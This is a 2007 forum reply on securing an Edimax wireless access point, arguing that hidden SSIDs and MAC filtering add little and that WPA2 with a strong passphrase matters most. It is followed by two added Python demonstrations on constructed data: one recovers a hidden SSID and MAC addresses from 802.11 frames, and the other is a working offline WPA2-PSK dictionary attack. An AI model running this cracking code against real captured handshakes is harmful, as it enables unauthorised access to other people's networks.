Old 05-01-2007, 05:25 PM
Jeff Liebermann
Re: EW-7206APg Wireless LAN Access Point

yousaf.hassan@gmail.com hath wroth:

>Thanks for your reply.
>
>Could you please explain why disabling ESSID broadcast would add
>nothing to security? The manual says:
>
>"If you enable "Broadcast ESSID", every wireless station located
>within the coverage of this access point can discover this access
>point easily. If you are building a public wireless network, enabling
>this feature is recommended. Disabling "Broadcast ESSID" can provide
>better security."
>
>My network is a private home network, so I want to disable it.


Security by obscurity is not a good idea. Anyone with a decent
wireless sniffer (Kismet on Linux) can find your SSID. If someone
were interested in breaking into your network, or sniffing the
traffic, it is trivial to extract the SSID from a capture file.

However, what hiding the SSID does is prevent neighbors and other
users from easily detecting your system. If someone moves in next
door, and sets up a network on your channel, both will get
interference, but your system will not show up on their "site survey".

Whether you decide to broadcast your SSID or not is entirely your
decision. To a knowledgeable hacker, it is not a problem and will not
slow them down in the slightest. To the neighboring systems, it's a
common source of confusion.

>As for IAPP, this is what the manual says:
>
>"If you enable "IAPP", the access point will automatically broadcast
>information of associated wireless stations to its neighbors. This
>will help wireless stations roam smoothly between access points. If
>you have more than one access point in your wireless LAN and wireless
>stations have roaming requirements, enabling this feature is
>recommended. Disabling "IAPP" can provide better security."
>
>I have only one access point, and my wireless stations do not have any
>roaming requirements. That's why I turned it off.


It doesn't matter, as IAPP requires that the neighboring access points'
MAC addresses be inscribed in the configuration files so that the
roaming client can keep the same IP address and successfully
re-authenticate with 802.1x from any access point in the system.
Without multiple access points, IAPP is useless. On or off doesn't
matter as it's not going to generate any traffic with only one access
point in the system.

>As for encryption and security, both WPA (with a strong passphrase)
>and MAC access control are enabled.


WPA is your primary security method. Avoid dictionary words in the
passphrase.

MAC address filtering has been somewhat of a problem for my customers.
The problem is that someone shows up with a new computer or game
machine and wants to connect. So, the owner has to dig into the AP or
wireless router configuration in order to add the new device. After
doing this about 5 times, I'm usually asked by the customer how to
defeat this non-feature. It's also not a very useful security feature
as MAC addresses are sent un-encrypted in 802.11 packets. They're
there for everyone to see, no matter how much encryption you have
configured. MAC addresses are also very easy to spoof.
<http://en.wikisource.org/wiki/Changing_MAC_addresses>
I wouldn't bother with MAC address filtering.

>Could you also explain what Fast Roaming Threshold is? What value is
>recommended for this option? There is no mention in the manual for
>this!


That's a bit complicated as there are multiple proposed
implementations of fast roaming available.
<http://en.wikipedia.org/wiki/IEEE_802.11r>
If I knew which one the Edimax EW-7206APg supported, I could possibly
give a sane answer, but I'm late for lunch. Basically, it determines
how aggressively the access point holds onto a connection. Usually,
this is the responsibility of the client software, but 802.11r
transfers the responsibility to the access point. What happens is
that the access point tries to determine if the client is moving out
of range and should roam to a different access point in the system.
The threshold is probably related to some signal quality metric that
determines if the access point should give up trying to stay connected
and issue a disconnect message, which will cause the client to scan
for a better connection. Again, it's only applicable if you have
multiple access points in your WLAN system and should probably be left
at the default value.

Suggestion: Use WPA-2 to secure your network. Change the router
config and guest passwords. Get a RADIUS server if you don't like
shared WPA keys (probably overkill for a home system). Learn how to
read the log files to check for anything funny. Never mind the other
dumb ideas on securing your WLAN.

--
Jeff Liebermann jeffl@comix.santa-cruz.ca.us
150 Felker St #D http://www.LearnByDestroying.com
Santa Cruz CA 95060 http://802.11junk.com
Skype: JeffLiebermann AE6KS 831-336-2558

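The two points above about SSID hiding and MAC filtering (the SSID is trivial to pull out of a capture, and MAC addresses ride in the clear no matter what encryption is on) can be shown with a few bytes of 802.11. The following is an added example, not code from the original post or from Edimax: a minimal management-frame parser run over a constructed four-frame capture. The AP address 00:11:22:33:44:55, the client 66:77:88:99:aa:bb and the name "HomeNet" are made up for the demonstration. The beacon carries a zero-length SSID element (what "disable broadcast" actually does), the protected data frame has an encrypted body but a readable header, and the association request and probe response both name the network outright.

```python
import struct

# 802.11 frame control: type 0 = management; subtypes used below.
MGMT = 0
ASSOC_REQ, PROBE_RESP, BEACON = 0, 5, 8
SUBTYPE_NAME = {ASSOC_REQ: "association request", PROBE_RESP: "probe response", BEACON: "beacon"}
IE_SSID = 0
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_header(frame: bytes) -> dict:
    """The 24-byte MAC header is never encrypted: frame control, duration, three addresses, sequence control."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    return {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "protected": bool(fc & 0x4000),  # Protected Frame bit: the body is ciphertext, the header is not
        "addr1": mac_str(frame[4:10]),
        "addr2": mac_str(frame[10:16]),
        "addr3": mac_str(frame[16:22]),
    }


def parse_ies(body: bytes) -> dict:
    """Information elements: 1-byte element id, 1-byte length, value."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        eid, length = body[i], body[i + 1]
        ies[eid] = body[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def extract_ssid(frame: bytes):
    """SSID carried by a management frame: '' for a hidden-SSID beacon, None if the frame has no SSID element."""
    h = parse_header(frame)
    if h["type"] != MGMT:
        return None
    body = frame[24:]
    if h["subtype"] in (BEACON, PROBE_RESP):
        body = body[12:]  # skip timestamp(8) + beacon interval(2) + capability(2)
    elif h["subtype"] == ASSOC_REQ:
        body = body[4:]   # skip capability(2) + listen interval(2)
    else:
        return None
    ssid = parse_ies(body).get(IE_SSID)
    return None if ssid is None else ssid.decode("utf-8", errors="replace")


def survey(frames):
    """Passive sniff over a capture: collect every MAC seen in a header and resolve each BSSID's SSID."""
    macs = set()
    networks = {}     # bssid -> SSID, or None while only a hidden beacon has been seen
    revealed_by = {}  # bssid -> subtype of the first frame that leaked the name
    for frame in frames:
        h = parse_header(frame)
        macs.update((h["addr1"], h["addr2"], h["addr3"]))
        ssid = extract_ssid(frame)
        if ssid is None:
            continue
        bssid = h["addr3"]  # BSSID sits in address 3 of management frames
        if ssid == "":
            networks.setdefault(bssid, None)
        elif networks.get(bssid) is None:
            networks[bssid] = ssid
            revealed_by[bssid] = SUBTYPE_NAME[h["subtype"]]
    macs.discard(BROADCAST)
    return macs, networks, revealed_by


def mgmt_frame(subtype, addr1, addr2, addr3, body):
    return struct.pack("<HH", (subtype << 4) | (MGMT << 2), 0) + addr1 + addr2 + addr3 + b"\x00\x00" + body


def ie(eid, data):
    return bytes([eid, len(data)]) + data


# Constructed sample capture (not real traffic): one AP with a hidden SSID, one client.
AP, STA, BCAST = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), b"\xff" * 6
FIXED = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)  # timestamp, beacon interval, capability (privacy bit set)
CAPTURE = [
    mgmt_frame(BEACON, BCAST, AP, AP, FIXED + ie(IE_SSID, b"") + ie(3, b"\x06")),  # hidden SSID: zero-length element
    struct.pack("<HH", 0x4108, 0) + AP + STA + AP + b"\x00\x00" + bytes.fromhex("deadbeefcafe"),  # protected data frame
    mgmt_frame(ASSOC_REQ, AP, STA, AP, struct.pack("<HH", 0x0411, 10) + ie(IE_SSID, b"HomeNet")),  # client names it
    mgmt_frame(PROBE_RESP, STA, AP, AP, FIXED + ie(IE_SSID, b"HomeNet")),  # AP answers a directed probe with it
]

if __name__ == "__main__":
    macs, networks, revealed_by = survey(CAPTURE)
    print("MACs readable in the clear:", sorted(macs))
    print("networks:", networks, "revealed by:", revealed_by)
```

Running it shows both station addresses recovered from the encrypted data frame's header, which is all a MAC-filter bypass needs, and the "hidden" network resolved to HomeNet the moment the client associates. A real sniffer such as Kismet does the same thing over live frames; hiding the SSID only delays the name until the first client shows up.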
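The advice to avoid dictionary words in the WPA passphrase (and the suggestion of RADIUS for anyone who dislikes a shared key) rests on how WPA-Personal turns the passphrase into keys. This is an added example, not from the original post: it derives the PMK with PBKDF2 as 802.11i specifies (checked against the standard's "password"/"IEEE" test vector), expands it to the Key Confirmation Key, and then runs an offline dictionary attack against a constructed handshake message 2 of the 4-way exchange. The SSID "HomeNet", the addresses, nonces, word list and the two passphrases are all made-up inputs; the EAPOL-Key layout and the WPA2 (HMAC-SHA1) MIC rule are the real ones.

```python
import hashlib
import hmac
import struct


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK: the Key Confirmation Key that authenticates the handshake messages."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


MIC_OFFSET = 81  # EAPOL header (4) + Key Descriptor fields that precede the Key MIC (77)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key Descriptor Version 2 (WPA2/AES): HMAC-SHA1 over the frame with the MIC field zeroed, cut to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP): carries SNonce and a MIC under the KCK."""
    key_info = 0x010A  # descriptor version 2, Pairwise, Key MIC present
    body = (struct.pack(">BHH", 2, key_info, 16) + b"\x00" * 8 + snonce       # type, key info, key len, replay ctr, nonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8                        # key IV, key RSC, key ID
            + b"\x00" * 16 + struct.pack(">H", 0))                            # key MIC (filled below), key data length
    frame = struct.pack(">BBH", 2, 3, len(body)) + body                       # EAPOL version 2, type 3 = Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol):
    """Offline dictionary attack: one PBKDF2 + PRF per candidate, checked against the captured MIC."""
    observed = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_kck(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol), observed):
            return candidate
    return None


# Constructed sample handshake parameters (not a real capture).
SSID = "HomeNet"
AA, SPA = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
WORDLIST = ["password", "letmein", "sunflower", "dragon"]


def handshake_for(passphrase: str) -> bytes:
    """Message 2 as a client holding this passphrase would send it."""
    return build_msg2(SNONCE, derive_kck(derive_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE))


def demo():
    weak = crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, handshake_for("sunflower"))
    strong = crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, handshake_for("Vq7!kp2#Lz9m-Rt4"))
    return weak, strong


if __name__ == "__main__":
    print(demo())
```

The dictionary word falls to a single captured handshake with no further interaction with the AP, while the random passphrase survives the same word list. Two caveats worth knowing: the SSID is the PBKDF2 salt, so a common SSID lets an attacker reuse precomputed PMK tables, and none of this applies to RADIUS/802.1X, where each client gets its own PMK and there is no shared secret to guess.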